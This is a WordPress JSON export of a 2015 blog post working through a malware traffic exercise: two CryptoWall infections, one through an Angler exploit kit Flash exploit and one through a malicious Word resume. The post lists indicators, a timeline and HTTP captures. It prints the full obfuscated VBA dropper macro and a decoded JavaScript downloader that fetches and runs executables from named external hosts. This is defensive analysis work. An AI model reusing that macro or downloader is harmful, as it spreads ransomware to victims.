{"id":188,"date":"2015-09-29T22:41:01","date_gmt":"2015-09-29T21:41:01","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=188"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-2015-09-11-a-bridge-too-far-enterprises","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=188","title":{"rendered":"Malware Exercise 2015-09-11 – A Bridge Too Far Enterprises"},"content":{"rendered":"

So I am a little late with this one as I just could not find the mental capacity to finish this one on time due to a head cold that turned into a sinus infection (which I am still fighting). Based on what Brad had said about this one, it was one of his more “tricky” exercises and some of the other analysts seem to confirm that as well. With that being said, I seem to get the gist of it pretty quickly. The thing that threw me off was the fact that I did not see the traffic hitting the CryptoWall site at all as I like to scan the PCAP, see what stands out from the filter ‘http.request,” see what the protocol usage is in Wireshark, and then start to look at the traffic from the end and work from there. With that being said, let’s jump into the analysis…<\/p>\n

My Results<\/h3>\n

– The infected computer’s host name.
\n> FRANKLION-PC<\/p>\n

– The infected computer’s MAC address.
\n> 14:fe:b5:ab:ec:7d<\/p>\n

– The infected computer’s operating system.
\n> Windows 7 IE 11<\/p>\n

– Indicators of Compromise from these infections.
\n> prideorganizer.com \/ 104.28.9.93 (Page that had hidden iframe)
\n> randt.smittysautomart.org \/ 216.245.212.78 (This was the start of the infection chain from the Angler EK)
\n> ip-addr.es \/ 188.165.164.184 (IP call-back from CryptoWall)
\n> externalbatterycase.com \/ 192.186.222.229 (post call back from infection from first infection)
\n> greenevap.com\/ 50.63.95.1 (post call back from infection from second infection)
\n> employance.com \/ 173.201.1.1 (post call back from infection from second infection)<\/p>\n

– A timeline and chain of events for each of the infections.
\n> First Cryptowall infection from infected website (prideorganizer.com)
\n> User hits the site with the hidden iframe – Fri, Sep 11, 2015 19:49:15 GMT
\n> Looks like user gets compromised with Flash exploit – Fri, 11 Sep 2015 19:49:21 GMT
\n> Binary file dropped onto user’s system – Fri, 11 Sep 2015 19:49:28 GMT
\n> We see a check of the user’s IP address – Fri, 11 Sep 2015 19:49:34 GMT<\/p>\n

> Second Cryptowall infection from malicious Word document
\n> User gets email from darylevenzor@yahoo.com at Fri, 11 Sep 2015 14:22:19 -5:00<\/p>\n

\"Email\"<\/a><\/p>\n

> We see a check of the user’s IP address – Fri, 11 Sep 2015 19:55:28 GMT<\/p>\n

Notes about the investigation<\/h3>\n

Looks like the start of the infection is from a hidden iframe in the site www.prideorganizer.com as you can see below:<\/p>\n

\"Hidden<\/a><\/p>\n

There seems to be a Flash exploit that is used against the system that is from the iframe mentioned above as seen below:<\/p>\n

\r\nGET \/except.webarchive?effect=_0KAfLZDy&amp;point=0oySNlI&amp;unite=YXy5&amp;as=6O4nE05A&amp;individual=UuaP&amp;international=&amp;march=8inGVb3g8KcYWAB7 HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-US\r\nReferer: http:\/\/randt.smittysautomart.org\/boards\/index.php?PHPSESSID=99&amp;action=9x3bc575.2r387u5mjy726\r\nx-flash-version: 18,0,0,203\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\nHost: randt.smittysautomart.org\r\nDNT: 1\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.8.0\r\nDate: Fri, 11 Sep 2015 19:49:21 GMT\r\nContent-Type: application\/x-shockwave-flash\r\nContent-Length: 42952\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n\r\nCWS\r\n}...x.|.I..H. ...D.\\_....^..@.l.@.. ......}..... A...}..:ht.q.$.7..l4ee...2...zF.w.aLG.....2..\r\n<\/pre>\n
After the Flash exploit, I see what looks like a binary from what Wireshark tells me (application\/octect-stream) as seen in the traffic below:<\/p>\n
\r\nGET \/answer.cha?force=PSZ&amp;ever=YdkQAl&amp;growth=9QZ_ungGJ&amp;night=&amp;listen=a8Cx&amp;beyond=&amp;word=dhV684&amp;series=&amp;use=j2PgIqpn8e&amp;quite=&amp;away=5qnyzuAwSW HTTP\/1.1\r\nConnection: Keep-Alive\r\nHost: randt.smittysautomart.org\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.8.0\r\nDate: Fri, 11 Sep 2015 19:49:28 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 216076\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n<\/pre>\n
Shortly after what I believe is the binary for the first CryptoWall infection being used on the victim’s system, I see that there is a call to get the current external IP address of the victim’s system:<\/p>\n
\r\nCT&gt; info 192\r\nInfo of conversation 192:\r\n\r\nSERVER IP : 188.165.164.184:80\r\nTIME : Fri, 09\/11\/15 19:49:32\r\nHOST : ip-addr.es\r\nURI : \/\r\nREFERER :\r\nMETHOD : GET\r\nRESULT NUM : 200 OK\r\nRESULT TYPE : text\/plain\r\nFILE NAME : 191.html\r\nMAGIC : Inconclusive. Probably text (TEXT)\r\nLENGTH : 14 B\r\n\r\nCT&gt; head 192\r\nDisplaying header of object 192 (191.html):\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:34 GMT\r\nContent-Type: text\/plain;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nLast-Modified: Fri, 11 Sep 2015 19:49:34 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nPragma: no-cache\r\nX-XSS-Protection: 1\r\nServer: DYNAMIC+\r\n\r\nCT&gt; body 192 1000\r\nDisplaying body of object 192 (191.html) [14 bytes]:\r\n\r\n204.92.52.214\r\n<\/pre>\n
One thing to note here. Based on what I have been reading over the past couple of weeks, it seems that this site (ip-addr.es) is pretty synonymous with a CryptoWall checkin. Granted I am basing this on a lot of the traffic that Brad has been blogging about over on his blog.<\/p>\n
Once the IP has been checked, we can then see the post-infection call-backs from the initial CryptoWall infection. Also something to note here is that I am not sure what kind of encoding is being used in the POSTs that the call-backs are making. If anyone has any ideas of how to decode these, please drop me a line in the comments as that would be great to figure out.<\/p>\n
Also note where most of the call-backs are going… Most are going to compromised WordPress installs. Most of the things that I have been reading as of late have pointed NOT to vulnerable code within the core of WordPress, but more to vulnerable plugins that WordPress users use. In this case the call-backs are all pointing to a file called “ap4.php.” I tried to find something out about this particular file on Google, but I was not able to find anything about this file.<\/p>\n
\r\nPOST \/wp-admin\/js\/ap4.php?k=sqecun4kcv HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 132\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nv=725ecfe7d2246574f39c34cff4bf0a94ecc0bdde676c2b9f40c4e4db0c7941b0143388818b72d57452bf2079ebadb398326c20133c8e4aca7c8322bbd7c519c5f7HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:34 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\ne\r\n725d85b0dc6c68\r\n0\r\n<\/pre>\n
\r\nPOST \/wp-admin\/js\/ap4.php?s=8arbpstpadtvsgt HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 94\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nv=2c7478e56e90138e2c7a156008afea819ef6f5e4d9faf5c3ee75b64c0b59fe416f07aa448209316a97dbb389e5e2HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:37 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\n3e2\r\n2c7137b460881a922f245c6342ecd0dfd3b5bec4dce1dc...&lt;...<Long string>...&gt;...\r\n0\r\n<\/pre>\n
\r\nHTTP\/1.0 408 Request Time-out\r\nServer: AkamaiGHost\r\nMime-Version: 1.0\r\nDate: Fri, 11 Sep 2015 19:49:37 GMT\r\nContent-Type: text\/html\r\nContent-Length: 217\r\nExpires: Fri, 11 Sep 2015 19:49:37 GMT\r\n\r\n&lt;HTML&gt;&lt;HEAD&gt;\r\n&lt;TITLE&gt;Request Timeout&lt;\/TITLE&gt;\r\n&lt;\/HEAD&gt;&lt;BODY&gt;\r\n&lt;H1&gt;Request Timeout&lt;\/H1&gt;\r\nThe server timed out while waiting for the browser's request.&lt;P&gt;\r\nReference #2.e60b180.1442000977.0\r\n&lt;\/BODY&gt;&lt;\/HTML&gt;\r\n<\/pre>\n
\r\nPOST \/wp-admin\/js\/ap4.php?d=19j14vg1as70d2 HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 160\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nv=789811319369c1f9...<Long string>...b50d8f3eff3a0HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:40 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\nb2ea\r\n.PNG\r\n.\r\n...\r\n<\/pre>\n
\r\nPOST \/wp-admin\/js\/ap4.php?o=3p4z2b4dviy8iu0 HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 108\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: externalbatterycase.com\r\nCache-Control: no-cache\r\n\r\nz=54ceea7c2bd1aaadb88dc64404b...<Long string>...12e3040HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:49:54 GMT\r\nServer: Apache\/2.4.12\r\nX-Powered-By: PHP\/5.4.43\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\ne\r\n54c8a02a2599a7\r\n0\r\n<\/pre>\n
A little bit later we can then see the second run of CryptoWall from the user looking at the Word document (or in this case the resume) from ‘darylevenzor@yahoo.com.’ That document had the malicious binary embedded in it since we see the same call to the site ‘ip-addr.es’ shortly after the resume was opened:<\/p>\n
\r\nGET \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: ip-addr.es\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:55:28 GMT\r\nContent-Type: text\/plain;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nLast-Modified: Fri, 11 Sep 2015 19:55:28 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nPragma: no-cache\r\nX-XSS-Protection: 1\r\nServer: DYNAMIC+\r\n\r\ne\r\n204.92.52.214\r\n\r\n0\r\n<\/pre>\n
\r\nPOST \/mtqzpa\/templates\/ap5.php?u=l3fzfhor374a7t HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 130\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: greenevap.com\r\nCache-Control: no-cache\r\n\r\nz=ee2013940495e8a834556e2f5c168d6ee8e8e4b56a820...<Long string>...HTTP\/1.1 503 Service Unavailable\r\nDate: Fri, 11 Sep 2015 19:55:28 GMT\r\nServer: Apache\r\nContent-Length: 362\r\nConnection: close\r\nContent-Type: text\/html; charset=iso-8859-1\r\n\r\n&lt;!DOCTYPE HTML PUBLIC "-\/\/IETF\/\/DTD HTML 2.0\/\/EN"&gt;\r\n&lt;html&gt;&lt;head&gt;\r\n&lt;title&gt;503 Service Unavailable&lt;\/title&gt;\r\n&lt;\/head&gt;&lt;body&gt;\r\n&lt;h1&gt;Service Unavailable&lt;\/h1&gt;\r\n&lt;p&gt;The server is temporarily unable to service your\r\nrequest due to maintenance downtime or capacity\r\nproblems. Please try again later.&lt;\/p&gt;\r\n&lt;hr&gt;\r\n&lt;address&gt;Apache Server at greenevap.com Port 80&lt;\/address&gt;\r\n&lt;\/body&gt;&lt;\/html&gt;\r\n<\/pre>\n
\r\nPOST \/wp-includes\/theme-compat\/ap2.php?j=l3fzfhor374a7t HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: 130\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nHost: employance.com\r\nCache-Control: no-cache\r\n\r\nz=ee2013940495e8a834556e2f5c168d6ee8e8...<Long string>...145465HTTP\/1.1 200 OK\r\nDate: Fri, 11 Sep 2015 19:55:29 GMT\r\nServer: Apache\r\nVary: Accept-Encoding\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/html\r\n\r\ne\r\nee2057c70adde5\r\n0\r\n<\/pre>\n
Using OfficeMalScanner I was able to get some more information about how the Word document works since I was able to get the script that runs when the user launches the file as you can see below (and also how the author(s) feel about AV):<\/p>\n
\r\nAttribute VB_Name = "ThisDocument"\r\nAttribute VB_Base = "1Normal.ThisDocument"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nSub Auto_Open()\r\n     zGCwkKBGTOs\r\nEnd Sub\r\n\r\nSub zGCwkKBGTOs()\r\n     Dim ezbVRLGmmo As String\r\n     Dim iqvhxHmFSdrrP As String\r\n     Dim iYwihdJA As Integer\r\n     Dim bvNUjgU As String\r\n     Dim VBJeJNNj As Byte\r\n     Dim dRZAVyCRqn As Paragraph\r\n     Dim XhnzHZgleilRL As Long\r\n     Dim CAMGDebZMD As Integer\r\n     Dim splRmDLtFg As String\r\n     Dim eOqQRgYctMzmuZ As String\r\n     Dim dsuvHC As String\r\n     Dim MniQXWEhfv As Boolean\r\n     Dim QbhrXGT As Integer\r\n     bvNUjgU = "zqnuhsi&H46&H55&H43&H4B2&H047&H44&H41&H54&H41&H21"\r\n     splRmDLtFg = "exe"\r\n     eOqQRgYctMzmuZ = "iaEhcYUCk" + "o"\r\n     HHRSydvjwaq = "."\r\n     ezbVRLGmmo = eOqQRgYctMzmuZ + HHRSydvjwaq + splRmDLtFg\r\n     YqPyWrU\r\n     iYwihdJA = FreeFile()\r\n\r\n     AGRVOkemteQ\r\n\r\n     Debug.Print ("After OnTime: " & Now)\r\n\r\n     Dim opobUCTy As String\r\n     Dim LyunJq As String\r\n     Dim cBFXXhV As String\r\n     Dim dtxmeZtrxOLted As String\r\n     Dim XtibNFnRE As Document\r\n     Set dEqXIBDNuKqF = CreateObject("Sc" + "riptContro" + "l")\r\n     dEqXIBDNuKqF.Language = "VBS" + "cri" + "p" + "t"\r\n     opobUCTy = "ActiveDocumen" + "t" + "."\r\n     cBFXXhV = "Paragraph" + "s"\r\n     LyunJq = opobUCTy + cBFXXhV\r\n     Set VeZpOpVh = GetObject(, "word" + ".Applic" + "atio" + "n")\r\n     On Error GoTo JFhYAolPD\r\n     dEqXIBDNuKqF.AddObject "Obj", VeZpOpVh\r\n\r\n     Dim FwKeQXNgqxMxvnL As Boolean\r\n     FwKeQXNgqxMxvnL = False\r\n     Dim DhvFHjK As Boolean\r\n     DhvFHjK = True\r\n\r\nJFhYAolPD:\r\n     For Each dRZAVyCRqn In dEqXIBDNuKqF.Eval("Obj." & LyunJq)\r\n          hPuJZIlGpcz (dRZAVyCRqn)\r\n          iqvhxHmFSdrrP = dRZAVyCRqn.Range.Text\r\n          Debug.Print ("After OnTime: " & Now)\r\n          If (MniQXWEhfv = True) Then\r\n               XhnzHZgleilRL = (37 - 36)\r\n          Dim VCAMcIBwsA As Integer\r\n          VCAMcIBwsA = (68 - 64)\r\n               While (XhnzHZgleilRL < Len(iqvhxHmFSdrrP))\r\n                    VBJeJNNj = Mid(iqvhxHmFSdrrP, XhnzHZgleilRL, VCAMcIBwsA)\r\n                    Debug.Print ("After OnTime: " & Now)\r\n                    Put #iYwihdJA, , VBJeJNNj\r\n                    XhnzHZgleilRL = XhnzHZgleilRL + (7 - 3)\r\n               Wend\r\n          ElseIf (InStr((88 - 87), iqvhxHmFSdrrP, bvNUjgU) > (64 - 64) And Len(iqvhxHmFSdrrP) > (27 - 27)) Then\r\n               MniQXWEhfv = DhvFHjK\r\n          End If\r\n          Next\r\n     Debug.Print ("After OnTime: " & Now)\r\n     If (FwKeQXNgqxMxvnL = True) Then\r\n          MsgBox ("FUCK AV")\r\n     Else\r\n          Close #iYwihdJA\r\n     End If\r\n     HYUzMcPhknOwSHA (ezbVRLGmmo)\r\nEnd Sub\r\n\r\nSub AutoOpen()\r\n     Auto_Open\r\nEnd Sub\r\n\r\nSub HYUzMcPhknOwSHA(ezbVRLGmmo As String)\r\n     Dim dsuvHC As String\r\n     Dim dphUNjFKvsin As Object\r\n     Dim QbhrXGT As Integer\r\n     dsuvHC = Environ("USERPROFIL" + "E")\r\n     ChDrive (dsuvHC)\r\n     ChDir (dsuvHC)\r\n\r\n     Debug.Print ("After OnTime: " & Now)\r\n\r\n     Set dphUNjFKvsin = VBA.CreateObject("WSc" + "ript" + ".She" + "l" + "l")\r\n     On Error Resume Next\r\n     dphUNjFKvsin.Run (ezbVRLGmmo)\r\n     TdkFfShCkIHO\r\nEnd Sub\r\n\r\nSub hPuJZIlGpcz(fVXCWogxUYsIi)\r\n     DoEvents\r\nEnd Sub\r\n\r\nSub AGRVOkemteQ()\r\n     Dim splRmDLtFg As String\r\n     Dim ezbVRLGmmo As String\r\n     Dim eOqQRgYctMzmuZ As String\r\n     Dim iYwihdJA As Integer\r\n     Dim HHRSydvjwaq As String\r\n     eOqQRgYctMzmuZ = "iaEhcYUCko"\r\n     HHRSydvjwaq = "."\r\n     splRmDLtFg = "exe"\r\n     ezbVRLGmmo = eOqQRgYctMzmuZ + HHRSydvjwaq + splRmDLtFg\r\n     iYwihdJA = FreeFile()\r\n     Open ezbVRLGmmo For Binary As iYwihdJA\r\nEnd Sub\r\n\r\nSub TdkFfShCkIHO()\r\n     Word.ActiveDocument.Range.Select\r\n     Selection.WholeStory\r\n     Selection.Delete Unit:=wdCharacter, Count:=(53 - 52)\r\n     Dim hnyvtVpsnYB As Word.Document\r\n     Set hnyvtVpsnYB = ThisDocument\r\n     hnyvtVpsnYB.Range.InsertParagraphAfter\r\n     hnyvtVpsnYB.Range.InsertAfter "" + vbLf\r\nEnd Sub\r\n\r\nSub YqPyWrU()\r\n     dsuvHC = Environ("USERPRO" + "FIL" + "E")\r\n     ChDrive (dsuvHC)\r\n     ChDir (dsuvHC)\r\nEnd Sub\r\n\r\nSub Workbook_Open()\r\n     Auto_Open\r\nEnd Sub\r\n<\/pre>\n
Information about malicious files from the investgation:
\n===================================<\/p>\n
Name: except.webarchive.swf
\nMD5: b1938532d94bb3cb618a09d754f8e87a
\nDetection ratio from VT: 8 \/ 56
\nVT link: http:\/\/www.virustotal.com\/en\/file\/90665db61bc3b7ff37927367ad6c7a41a94d4b38ac3067527b9ea1e335667a91\/analysis\/<\/p>\n
*Name: js-1.exe
\nMD5: d48ef4bb0549a67083017169169ef3ee
\nDetection ratio from VT: 5 \/ 56
\nVT link: http:\/\/www.virustotal.com\/en\/file\/daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05\/analysis\/<\/p>\n
*Name: js-3.exe
\nMD5: 9c23ea676cd623e4527db2336ebff335
\nDetection ratio from VT: 31 \/ 57
\nVT link: http:\/\/www.virustotal.com\/en\/file\/33c80532e3cbabe39fba8318d91f14dd956f20033725878c4832a2fc063dafb2\/analysis\/<\/p>\n
*The files js-1 and js-3 (js-2 got deleted by accident) were caught by running the javascript code in a browser. The interesting thing about this one is that I was also able to decode it via Malzilla. The output of that decode can be found below:<\/p>\n
\r\nfunction dl(fr) { var b = "ihaveavoice2.com laterrazzafiorita.it idsecurednow.com".split(" "); \r\nfor (var i=0; i<b.length; i++) { var ws = new ActiveXObject("WScript.Shell"); \r\nvar fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe"; \r\nvar dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP"); \r\nxo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject("ADODB.Stream"); \r\nxa.open(); xa.type = 1; xa.write(xo.ResponseBody); \r\nif (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); \r\ntry { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; \r\ntry { xo.open("GET","http:\/\/"+b[i]+"\/document.php?rnd="+fr+"&id="+str, false); \r\nxo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(2461); dl(6862); dl(1503);\r\n<\/pre>\n
One day I will have to see what I can come up with with regards to trying to reverse engineer these executables. Until then they lay here and wait.<\/p>\n
**Name: vbaProject.bin
\nMD5: 646bc5e99b9354c9ad787ccf733a4b38
\nDetection ratio from VT: 7 \/ 57
\nVT link: http:\/\/www.virustotal.com\/en\/file\/7798181485f06ce8f34a2d2f7d01137309b19ca80924ee1e0fc185734aa4a188\/analysis\/1444160706\/<\/p>\n
**The bin file was extracted from the malicious word document (the resume) which I believe has the embedded binary of CryptoWall since there are no calls to any web resources in the script.<\/p>\n
So that is it for this one. As usual, if you want the things that I found please hit up my GitHub page for the artifacts. On to the next one investigation.<\/p>\n","protected":false},"excerpt":{"rendered":"
So I am a little late with this one as I just could not find the mental capacity to finish this one on time due to a head cold that turned into a sinus infection (which I am still fighting). Based on what Brad had said about this one, it was one of his more “tricky” exercises and some of the other analysts seem to confirm that as well. With that being said, I seem to get the gist of it pretty quickly. The thing that threw me off was the fact that I did not see the traffic hitting…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-188","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=188"}],"version-history":[{"count":12,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/188\/revisions"}],"predecessor-version":[{"id":204,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/188\/revisions\/204"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}